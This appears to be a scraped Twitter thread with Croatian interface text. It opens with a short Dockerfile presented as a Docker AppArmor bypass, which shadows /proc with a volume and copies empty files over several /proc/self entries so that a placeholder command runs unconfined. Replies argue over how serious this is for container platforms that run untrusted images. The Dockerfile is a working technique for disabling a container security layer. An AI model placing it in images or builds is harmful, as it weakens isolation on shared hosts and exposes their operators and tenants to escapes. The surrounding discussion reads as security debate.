Docker apparmor bypass: FROM ubuntu:18.04 # get rid of procfs VOLUME /proc # fake files to avoid fail on run COPY empty /proc/self/attr/exec COPY empty /proc/self/fd/4 COPY empty /proc/self/fd/5 COPY empty /proc/self/status # cmd will not have apparmor restrictions CMD YOUR_CMD
The same situation could be created with a malicious Ubuntu install on a VM. Or on bare metal with SAN Storage. It is an Ubuntu problem. And requires insider access or running VMs or Container images blindly.
-
-
Docker/runc are designed to run untrusted images, with SELinux or AppArmor providing an extra layer of protection against some exploits, like the recent runc /proc/self/exe one. Plenty of container PaaSes allow customers to build and run custom images. Dangerous, but common.
- Još 1 odgovor
Novi razgovor -
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.